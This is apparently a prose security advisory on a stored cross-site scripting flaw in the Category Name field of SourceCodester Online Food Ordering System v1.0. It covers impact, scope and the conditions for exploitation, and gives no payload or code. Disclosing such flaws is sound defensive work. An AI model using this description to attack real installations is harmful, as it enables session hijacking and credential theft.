A stored cross‑site scripting vulnerability exists in the Category management module of the SourceCodester Online Food Ordering System v1.0. When an administrator or privileged user creates or updates a category, the application fails to sanitize input supplied to the Category Name field. The injected JavaScript is persisted and executed automatically whenever the category is rendered in the admin‑panel or public Category list page. The primary impact of this flaw is that any user who views the affected page can have arbitrary JavaScript executed in their browser, enabling attackers to hijack sessions, steal credentials, deface the site, or perform further malicious actions in the victim’s context. This weakness is classified as a CWE‑79 input validation failure that leads to stored cross‑site scripting.

The issue is limited to the SourceCodester Online Food Ordering System version 1.0. No other vendors, products, or versions are listed in the advisory. The flaw exists specifically in the admin panel’s Category Name input configuration and is not reported to affect any other components of the application.

The stored payload does not require any external trigger beyond the initial creation or editing of a category; once a malicious string is stored, every subsequent view of the category will execute the script. Exploitation is straightforward for an attacker who can authenticate as a user with enough privileges to add or update categories. While the CVSS score and EPSS metric are not publicly available, the advisory indicates the absence of mitigation, suggesting a high likelihood of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog, but the potential harm to confidentiality and integrity of user sessions warrants immediate attention.